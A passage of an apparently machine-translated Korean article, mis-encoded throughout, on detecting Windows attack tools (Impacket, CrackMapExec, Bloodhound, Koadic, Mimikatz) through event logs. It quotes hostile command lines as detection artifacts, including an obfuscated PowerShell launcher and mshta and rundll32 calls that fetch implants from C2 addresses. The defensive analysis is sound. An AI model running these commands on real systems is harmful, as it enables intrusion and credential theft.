2. 4688 - ์ง€์  1์˜ ์ธ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ cmd.exe ํ”„๋กœ์„ธ์Šค๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.
3. 5145 - C$ ๋””๋ ‰ํ„ฐ๋ฆฌ์˜ __output ํŒŒ์ผ์— ๋Œ€ํ•œ ์•ก์„ธ์Šค ๊ถŒํ•œ์„ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค.
4. 4697 โ€” ํ”ผํ•ด์ž์˜ ์ปดํ“จํ„ฐ์— ์„œ๋น„์Šค ์„ค์น˜.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ์ง€์  4์˜ ์ธ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ cmd.exe ํ”„๋กœ์„ธ์Šค๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.
6. 5145 - C$ ๋””๋ ‰ํ„ฐ๋ฆฌ์˜ __output ํŒŒ์ผ์— ๋Œ€ํ•œ ์•ก์„ธ์Šค ๊ถŒํ•œ์„ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค.

Impacket์€ ๊ณต๊ฒฉ ๋„๊ตฌ ๊ฐœ๋ฐœ์˜ ๊ธฐ๋ฐ˜์ด ๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” Windows ์ธํ”„๋ผ์˜ ๊ฑฐ์˜ ๋ชจ๋“  ํ”„๋กœํ† ์ฝœ์„ ์ง€์›ํ•˜๋Š” ๋™์‹œ์— ๊ณ ์œ ํ•œ ํŠน์ง•์„ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์—๋Š” ํŠน์ • winreg ์š”์ฒญ, ํŠน์ง•์ ์ธ ๋ช…๋ น ๊ตฌ์„ฑ์„ ๊ฐ–์ถ˜ SCM API ์‚ฌ์šฉ, ํŒŒ์ผ ์ด๋ฆ„ ํ˜•์‹, SMB ๊ณต์œ  SYSTEM32๊ฐ€ ๋‚˜์™€ ์žˆ์Šต๋‹ˆ๋‹ค.

CRACKMAPEXEC

CME ๋„๊ตฌ๋Š” ์ฃผ๋กœ ๊ณต๊ฒฉ์ž๊ฐ€ ๋„คํŠธ์›Œํฌ ๋‚ด์—์„œ ๋ฐœ์ „ํ•˜๊ธฐ ์œ„ํ•ด ์ˆ˜ํ–‰ํ•ด์•ผ ํ•˜๋Š” ์ผ์ƒ์ ์ธ ์ž‘์—…์„ ์ž๋™ํ™”ํ•˜๋„๋ก ์„ค๊ณ„๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด ์ž˜ ์•Œ๋ ค์ง„ Empire ์—์ด์ „ํŠธ ๋ฐ Meterpreter์™€ ํ•จ๊ป˜ ์ž‘์—…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ช…๋ น์„ ์€๋ฐ€ํ•˜๊ฒŒ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•ด CME๋Š” ๋ช…๋ น์„ ๋‚œ๋…ํ™”ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” Bloodhound(๋ณ„๋„ ์ •์ฐฐ ๋„๊ตฌ)๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ™œ์„ฑ ๋„๋ฉ”์ธ ๊ด€๋ฆฌ์ž ์„ธ์…˜ ๊ฒ€์ƒ‰์„ ์ž๋™ํ™”ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋ธ”๋Ÿฌ๋“œ ํ•˜์šด๋“œ

๋…๋ฆฝํ˜• ๋„๊ตฌ์ธ Bloodhound๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ๋„คํŠธ์›Œํฌ ๋‚ด์—์„œ ๊ณ ๊ธ‰ ์ •์ฐฐ์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์šฉ์ž, ์ปดํ“จํ„ฐ, ๊ทธ๋ฃน, ์„ธ์…˜์— ๋Œ€ํ•œ ๋ฐ์ดํ„ฐ๋ฅผ ์ˆ˜์ง‘ํ•˜๋ฉฐ PowerShell ์Šคํฌ๋ฆฝํŠธ ๋˜๋Š” ๋ฐ”์ด๋„ˆ๋ฆฌ ํŒŒ์ผ๋กœ ์ œ๊ณต๋ฉ๋‹ˆ๋‹ค. ์ •๋ณด๋ฅผ ์ˆ˜์ง‘ํ•˜๋Š” ๋ฐ๋Š” LDAP ๋˜๋Š” SMB ๊ธฐ๋ฐ˜ ํ”„๋กœํ† ์ฝœ์ด ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. CME ํ†ตํ•ฉ ๋ชจ๋“ˆ์„ ์‚ฌ์šฉํ•˜๋ฉด Bloodhound๋ฅผ ํ”ผํ•ด์ž์˜ ์ปดํ“จํ„ฐ์— ๋‹ค์šด๋กœ๋“œํ•˜๊ณ  ์‹คํ–‰ํ•œ ํ›„ ์ˆ˜์ง‘๋œ ๋ฐ์ดํ„ฐ๋ฅผ ์‹คํ–‰ํ•˜๊ณ  ์ˆ˜์‹ ํ•  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ ์‹œ์Šคํ…œ์˜ ์ž‘์—…์„ ์ž๋™ํ™”ํ•˜๊ณ  ๋ˆˆ์— ๋„์ง€ ์•Š๊ฒŒ ๋งŒ๋“ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Bloodhound ๊ทธ๋ž˜ํ”ฝ ์…ธ์€ ์ˆ˜์ง‘๋œ ๋ฐ์ดํ„ฐ๋ฅผ ๊ทธ๋ž˜ํ”„ ํ˜•์‹์œผ๋กœ ํ‘œ์‹œํ•˜๋ฏ€๋กœ ๊ณต๊ฒฉ์ž์˜ ์ปดํ“จํ„ฐ์—์„œ ๋„๋ฉ”์ธ ๊ด€๋ฆฌ์ž๊นŒ์ง€์˜ ์ตœ๋‹จ ๊ฒฝ๋กœ๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 6. ๋ธ”๋Ÿฌ๋“œํ•˜์šด๋“œ ์ธํ„ฐํŽ˜์ด์Šค

ํ”ผํ•ด์ž์˜ ์ปดํ“จํ„ฐ์—์„œ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•ด ๋ชจ๋“ˆ์€ ATSVC ๋ฐ SMB๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ž‘์—…์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ATSVC๋Š” Windows ์ž‘์—… ์Šค์ผ€์ค„๋Ÿฌ ์ž‘์—…์„ ์œ„ํ•œ ์ธํ„ฐํŽ˜์ด์Šค์ž…๋‹ˆ๋‹ค. CME๋Š” NetrJobAdd(1) ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•˜์—ฌ ๋„คํŠธ์›Œํฌ๋ฅผ ํ†ตํ•ด ์ž‘์—…์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. CME ๋ชจ๋“ˆ์ด ๋ณด๋‚ด๋Š” ๋‚ด์šฉ์˜ ์˜ˆ๊ฐ€ ๊ทธ๋ฆผ 7์— ๋‚˜์™€ ์žˆ์Šต๋‹ˆ๋‹ค. XNUMX: ์ด๊ฒƒ์€ XML ํ˜•์‹์˜ ์ธ์ˆ˜ ํ˜•ํƒœ๋กœ ๋œ cmd.exe ๋ช…๋ น ํ˜ธ์ถœ ๋ฐ ๋‚œ๋…ํ™”๋œ ์ฝ”๋“œ์ž…๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
๊ทธ๋ฆผ 7. CME๋ฅผ ํ†ตํ•ด ์ž‘์—… ์ƒ์„ฑ

์‹คํ–‰์„ ์œ„ํ•ด ์ž‘์—…์ด ์ œ์ถœ๋œ ํ›„ ํ”ผํ•ด์ž์˜ ์ปดํ“จํ„ฐ๋Š” Bloodhound ์ž์ฒด๋ฅผ ์‹œ์ž‘ํ•˜๋ฉฐ ์ด๋Š” ํŠธ๋ž˜ํ”ฝ์—์„œ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๋ชจ๋“ˆ์€ ํ‘œ์ค€ ๊ทธ๋ฃน, ๋„๋ฉ”์ธ์˜ ๋ชจ๋“  ์‹œ์Šคํ…œ ๋ฐ ์‚ฌ์šฉ์ž ๋ชฉ๋ก์„ ์–ป๊ณ  SRVSVC NetSessEnum ์š”์ฒญ์„ ํ†ตํ•ด ํ™œ์„ฑ ์‚ฌ์šฉ์ž ์„ธ์…˜์— ๋Œ€ํ•œ ์ •๋ณด๋ฅผ ์–ป๋Š” LDAP ์ฟผ๋ฆฌ๊ฐ€ ํŠน์ง•์ž…๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 8. SMB๋ฅผ ํ†ตํ•ด ํ™œ์„ฑ ์„ธ์…˜ ๋ชฉ๋ก ์–ป๊ธฐ

๋˜ํ•œ ๊ฐ์‚ฌ๊ฐ€ ํ™œ์„ฑํ™”๋œ ํ”ผํ•ด์ž ์ปดํ“จํ„ฐ์—์„œ Bloodhound๋ฅผ ์‹œ์ž‘ํ•˜๋ฉด ID 4688(ํ”„๋กœ์„ธ์Šค ์ƒ์„ฑ) ๋ฐ ํ”„๋กœ์„ธ์Šค ์ด๋ฆ„์ด ํฌํ•จ๋œ ์ด๋ฒคํŠธ๊ฐ€ ์ˆ˜๋ฐ˜๋ฉ๋‹ˆ๋‹ค. ยซC:WindowsSystem32cmd.exeยป. ์ฃผ๋ชฉํ• ๋งŒํ•œ ์ ์€ ๋ช…๋ น์ค„ ์ธ์ˆ˜์ž…๋‹ˆ๋‹ค.

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , โ€ฆ , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts ๋ชจ๋“ˆ์€ ๊ธฐ๋Šฅ ๋ฐ ๊ตฌํ˜„ ์ธก๋ฉด์—์„œ ๋งค์šฐ ํฅ๋ฏธ๋กญ์Šต๋‹ˆ๋‹ค. WMI๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด WQL ์ฟผ๋ฆฌ ์–ธ์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋‹ค์–‘ํ•œ Windows ๊ฐœ์ฒด์—์„œ ๋ฐ์ดํ„ฐ๋ฅผ ๊ฒ€์ƒ‰ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ๊ธฐ๋ณธ์ ์œผ๋กœ ์ด CME ๋ชจ๋“ˆ์—์„œ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. ํ”ผํ•ด์ž์˜ ์ปดํ“จํ„ฐ์— ์„ค์น˜๋œ ๋ณดํ˜ธ ๋„๊ตฌ์— ๋Œ€ํ•ด AntiSpywareProduct ๋ฐ AntiMirusProduct ํด๋ž˜์Šค์— ๋Œ€ํ•œ ์ฟผ๋ฆฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ํ•„์š”ํ•œ ๋ฐ์ดํ„ฐ๋ฅผ ์–ป๊ธฐ ์œ„ํ•ด ๋ชจ๋“ˆ์€ rootSecurityCenter2 ๋„ค์ž„์ŠคํŽ˜์ด์Šค์— ์—ฐ๊ฒฐํ•œ ๋‹ค์Œ WQL ์ฟผ๋ฆฌ๋ฅผ ์ƒ์„ฑํ•˜๊ณ  ์‘๋‹ต์„ ๋ฐ›์Šต๋‹ˆ๋‹ค. ๊ทธ๋ฆผ์—์„œ. ๊ทธ๋ฆผ 9๋Š” ์ด๋Ÿฌํ•œ ์š”์ฒญ๊ณผ ์‘๋‹ต์˜ ๋‚ด์šฉ์„ ๋ณด์—ฌ์ค๋‹ˆ๋‹ค. ์ด ์˜ˆ์—์„œ๋Š” Windows Defender๊ฐ€ ๋ฐœ๊ฒฌ๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 9. enum_avproducts ๋ชจ๋“ˆ์˜ ๋„คํŠธ์›Œํฌ ํ™œ๋™

์ด๋ฒคํŠธ์—์„œ WQL ์ฟผ๋ฆฌ์— ๋Œ€ํ•œ ์œ ์šฉํ•œ ์ •๋ณด๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ๋Š” WMI ๊ฐ์‚ฌ(WMI-Activity ์ถ”์ )๊ฐ€ ๋น„ํ™œ์„ฑํ™”๋˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์ข…์ข… ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ํ™œ์„ฑํ™”๋œ ๊ฒฝ์šฐ enum_avproducts ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‹คํ–‰๋˜๋ฉด ID 11์˜ ์ด๋ฒคํŠธ๊ฐ€ ์ €์žฅ๋˜๋ฉฐ ์—ฌ๊ธฐ์—๋Š” ์š”์ฒญ์„ ๋ณด๋‚ธ ์‚ฌ์šฉ์ž์˜ ์ด๋ฆ„๊ณผ rootSecurityCenter2 ๋„ค์ž„์ŠคํŽ˜์ด์Šค์˜ ์ด๋ฆ„์ด ํฌํ•จ๋ฉ๋‹ˆ๋‹ค.

๊ฐ CME ๋ชจ๋“ˆ์—๋Š” ํŠน์ • WQL ์ฟผ๋ฆฌ ๋˜๋Š” LDAP ๋ฐ SMB์˜ ๋‚œ๋…ํ™” ๋ฐ Bloodhound ๊ด€๋ จ ํ™œ๋™์„ ์‚ฌ์šฉํ•˜์—ฌ ์ž‘์—… ์Šค์ผ€์ค„๋Ÿฌ์—์„œ ํŠน์ • ์œ ํ˜•์˜ ์ž‘์—… ์ƒ์„ฑ ๋“ฑ ์ž์ฒด ์•„ํ‹ฐํŒฉํŠธ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค.

KOADIC

Koadic์˜ ๋…ํŠนํ•œ ํŠน์ง•์€ Windows์— ๋‚ด์žฅ๋œ JavaScript ๋ฐ VBScript ์ธํ„ฐํ”„๋ฆฌํ„ฐ๋ฅผ ์‚ฌ์šฉํ•œ๋‹ค๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์˜๋ฏธ์—์„œ ์ด๋Š” ํ† ์ง€์— ์˜์กดํ•˜์ง€ ์•Š๊ณ  ์ƒํ™œํ•˜๋Š” ๊ฒฝํ–ฅ์„ ๋”ฐ๋ฆ…๋‹ˆ๋‹ค. ์ฆ‰, ์™ธ๋ถ€ ์ข…์†์„ฑ์ด ์—†์œผ๋ฉฐ ํ‘œ์ค€ Windows ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ๊ฐ์—ผ ํ›„ ๊ธฐ๊ณ„์— "์ž„ํ”Œ๋ž€ํŠธ"๊ฐ€ ์„ค์น˜๋˜์–ด ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅํ•˜๋ฏ€๋กœ ์ด๋Š” ์™„์ „ํ•œ ๋ช…๋ น ๋ฐ ์ œ์–ด(CnC)๋ฅผ ์œ„ํ•œ ๋„๊ตฌ์ž…๋‹ˆ๋‹ค. Koadic ์šฉ์–ด๋กœ ์ด๋Ÿฌํ•œ ๊ธฐ๊ณ„๋ฅผ "์ข€๋น„"๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค. ํ”ผํ•ด์ž ์ธก์—์„œ ์ „์ฒด ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ์ด ๋ถ€์กฑํ•œ ๊ฒฝ์šฐ Koadic์€ UAC ์šฐํšŒ(User Account Control Bypass) ๊ธฐ์ˆ ์„ ์‚ฌ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ๋†’์ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 10. ์ฝ”์•„๋”• ์‰˜

ํ”ผํ•ด์ž๋Š” C&C ์„œ๋ฒ„์™€์˜ ํ†ต์‹ ์„ ์‹œ์ž‘ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ์œ„ํ•ด ๊ทธ๋…€๋Š” ๋ฏธ๋ฆฌ ์ค€๋น„๋œ URI์— ์ ‘์†ํ•˜๊ณ  ์Šคํ…Œ์ด์ € ์ค‘ ํ•˜๋‚˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ Koadic ๋ณธ์ฒด๋ฅผ ์ˆ˜์‹ ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋ฆผ์—์„œ. ๊ทธ๋ฆผ 11์€ mshta ์Šคํ…Œ์ด์ €์˜ ์˜ˆ๋ฅผ ๋ณด์—ฌ์ค๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 11. CnC ์„œ๋ฒ„์™€์˜ ์„ธ์…˜ ์ดˆ๊ธฐํ™”

์‘๋‹ต ๋ณ€์ˆ˜ WS์— ๋”ฐ๋ฅด๋ฉด WScript.Shell์„ ํ†ตํ•ด ์‹คํ–‰์ด ์ด๋ฃจ์–ด์ง€๋ฉฐ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ๋ณ€์ˆ˜์—๋Š” ํ˜„์žฌ ์„ธ์…˜์˜ ๋งค๊ฐœ ๋ณ€์ˆ˜์— ๋Œ€ํ•œ ์ฃผ์š” ์ •๋ณด๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ์Œ์ด ๋ถ„๋ช…ํ•ด์ง‘๋‹ˆ๋‹ค. ์ด๋Š” CnC ์„œ๋ฒ„์™€์˜ HTTP ์—ฐ๊ฒฐ์—์„œ ์ฒซ ๋ฒˆ์งธ ์š”์ฒญ-์‘๋‹ต ์Œ์ž…๋‹ˆ๋‹ค. ํ›„์† ์š”์ฒญ์€ ํ˜ธ์ถœ๋œ ๋ชจ๋“ˆ(์ž„ํ”Œ๋ž€ํŠธ)์˜ ๊ธฐ๋Šฅ๊ณผ ์ง์ ‘์ ์œผ๋กœ ๊ด€๋ จ๋ฉ๋‹ˆ๋‹ค. ๋ชจ๋“  Koadic ๋ชจ๋“ˆ์€ CnC์˜ ํ™œ์„ฑ ์„ธ์…˜์—์„œ๋งŒ ์ž‘๋™ํ•ฉ๋‹ˆ๋‹ค.

๋ฏธ๋ฏธ ์นด์ธ 

CME๊ฐ€ Bloodhound์™€ ํ•จ๊ป˜ ์ž‘๋™ํ•˜๋Š” ๊ฒƒ์ฒ˜๋Ÿผ Koadic์€ Mimikatz์™€ ๋ณ„๋„์˜ ํ”„๋กœ๊ทธ๋žจ์œผ๋กœ ์ž‘๋™ํ•˜๋ฉฐ ์ด๋ฅผ ์‹œ์ž‘ํ•˜๋Š” ๋‹ค์–‘ํ•œ ๋ฐฉ๋ฒ•์ด ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ์€ Mimikatz ์ž„ํ”Œ๋ž€ํŠธ ๋‹ค์šด๋กœ๋“œ๋ฅผ ์œ„ํ•œ ์š”์ฒญ-์‘๋‹ต ์Œ์ž…๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 12. Mimikatz๋ฅผ Koadic์œผ๋กœ ์ด์ „

์š”์ฒญ์˜ URI ํ˜•์‹์ด ์–ด๋–ป๊ฒŒ ๋ณ€๊ฒฝ๋˜์—ˆ๋Š”์ง€ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด์ œ ์„ ํƒํ•œ ๋ชจ๋“ˆ์„ ๋‹ด๋‹นํ•˜๋Š” csrf ๋ณ€์ˆ˜์˜ ๊ฐ’์ด ํฌํ•จ๋ฉ๋‹ˆ๋‹ค. ๊ทธ๋…€์˜ ์ด๋ฆ„์— ์ฃผ์˜๋ฅผ ๊ธฐ์šธ์ด์ง€ ๋งˆ์‹ญ์‹œ์˜ค. ์šฐ๋ฆฌ ๋ชจ๋‘๋Š” CSRF๊ฐ€ ์ผ๋ฐ˜์ ์œผ๋กœ ๋‹ค๋ฅด๊ฒŒ ์ดํ•ด๋œ๋‹ค๋Š” ๊ฒƒ์„ ์•Œ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์‘๋‹ต์€ Koadic ๋ณธ๋ฌธ๊ณผ ๋™์ผํ•˜๋ฉฐ Mimikatz ๊ด€๋ จ ์ฝ”๋“œ๊ฐ€ ์ถ”๊ฐ€๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ๊ฝค ๋ฐฉ๋Œ€ํ•˜๋‹ˆ ํ•ต์‹ฌ ๋‚ด์šฉ์„ ์‚ดํŽด๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์—๋Š” ์ด๋ฅผ ์ฃผ์ž…ํ•  ์ง๋ ฌํ™”๋œ .NET ํด๋ž˜์Šค์ธ base64๋กœ ์ธ์ฝ”๋”ฉ๋œ Mimikatz ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์™€ Mimikatz๋ฅผ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•œ ์ธ์ˆ˜๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ์‹คํ–‰ ๊ฒฐ๊ณผ๋Š” ์ผ๋ฐ˜ ํ…์ŠคํŠธ๋กœ ๋„คํŠธ์›Œํฌ๋ฅผ ํ†ตํ•ด ์ „์†ก๋ฉ๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 13. ์›๊ฒฉ ์‹œ์Šคํ…œ์—์„œ Mimikatz๋ฅผ ์‹คํ–‰ํ•œ ๊ฒฐ๊ณผ

Exec_cmd

Koadic์—๋Š” ์›๊ฒฉ์œผ๋กœ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ˆ๋„ ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์„œ๋Š” ๋™์ผํ•œ URI ์ƒ์„ฑ ๋ฐฉ๋ฒ•๊ณผ ์นœ์ˆ™ํ•œ sid ๋ฐ csrf ๋ณ€์ˆ˜๋ฅผ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. exec_cmd ๋ชจ๋“ˆ์˜ ๊ฒฝ์šฐ ์‰˜ ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐ”๋””์— ์ฝ”๋“œ๊ฐ€ ์ถ”๊ฐ€๋œ๋‹ค. ์•„๋ž˜์—๋Š” CnC ์„œ๋ฒ„์˜ HTTP ์‘๋‹ต์— ํฌํ•จ๋œ ์ฝ”๋“œ๊ฐ€ ๋‚˜์™€ ์žˆ์Šต๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 14. ์ž„ํ”Œ๋ž€ํŠธ ์ฝ”๋“œ exec_cmd

์ฝ”๋“œ ์‹คํ–‰์—๋Š” ์ต์ˆ™ํ•œ WS ์†์„ฑ์ด ์žˆ๋Š” GAWTUUGCFI ๋ณ€์ˆ˜๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. ๋„์›€์„ ๋ฐ›์•„ ์ž„ํ”Œ๋ž€ํŠธ๋Š” ์‰˜์„ ํ˜ธ์ถœํ•˜์—ฌ ์ถœ๋ ฅ ๋ฐ์ดํ„ฐ ์ŠคํŠธ๋ฆผ์„ ๋ฐ˜ํ™˜ํ•˜๋Š” shell.exec์™€ ๋ฐ˜ํ™˜ํ•˜์ง€ ์•Š๊ณ  shell.run์ด๋ผ๋Š” ๋‘ ๊ฐ€์ง€ ์ฝ”๋“œ ๋ถ„๊ธฐ๋ฅผ ์ฒ˜๋ฆฌํ•ฉ๋‹ˆ๋‹ค.

Koadic์€ ์ผ๋ฐ˜์ ์ธ ๋„๊ตฌ๋Š” ์•„๋‹ˆ์ง€๋งŒ ํ•ฉ๋ฒ•์ ์ธ ํŠธ๋ž˜ํ”ฝ์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ๋Š” ์ž์ฒด ์•„ํ‹ฐํŒฉํŠธ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค.

  • HTTP ์š”์ฒญ์˜ ํŠน๋ณ„ํ•œ ๊ตฌ์„ฑ,
  • winHttpRequests API๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ,
  • ActiveXObject๋ฅผ ํ†ตํ•ด WScript.Shell ๊ฐ์ฒด ์ƒ์„ฑ,
  • ํฐ ์‹คํ–‰ ๊ฐ€๋Šฅ ๋ณธ์ฒด.

์ดˆ๊ธฐ ์—ฐ๊ฒฐ์€ ์Šคํ…Œ์ด์ €์— ์˜ํ•ด ์‹œ์ž‘๋˜๋ฏ€๋กœ Windows ์ด๋ฒคํŠธ๋ฅผ ํ†ตํ•ด ํ•ด๋‹น ํ™œ๋™์„ ๊ฐ์ง€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. mshta์˜ ๊ฒฝ์šฐ ์ด๋Š” ์‹œ์ž‘ ์†์„ฑ์ด ์žˆ๋Š” ํ”„๋กœ์„ธ์Šค ์ƒ์„ฑ์„ ๋‚˜ํƒ€๋‚ด๋Š” ์ด๋ฒคํŠธ 4688์ž…๋‹ˆ๋‹ค.

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic์ด ์‹คํ–‰๋˜๋Š” ๋™์•ˆ ์ด๋ฅผ ์™„๋ฒฝํ•˜๊ฒŒ ํŠน์„ฑํ™”ํ•˜๋Š” ์†์„ฑ์„ ๊ฐ€์ง„ ๋‹ค๋ฅธ 4688 ์ด๋ฒคํŠธ๋ฅผ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

์กฐ์‚ฌ ๊ฒฐ๊ณผ

